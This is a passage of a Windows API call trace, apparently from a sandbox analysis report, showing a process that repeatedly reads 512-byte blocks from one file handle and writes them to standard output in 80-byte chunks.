lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.518] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.518] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, 
lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 
| out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.519] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.519] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.520] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.520] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 
[0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.521] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.521] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.522] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.522] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType 
(hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.523] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.523] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.523] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, 
lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.524] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.524] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: 
hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.532] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.532] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle 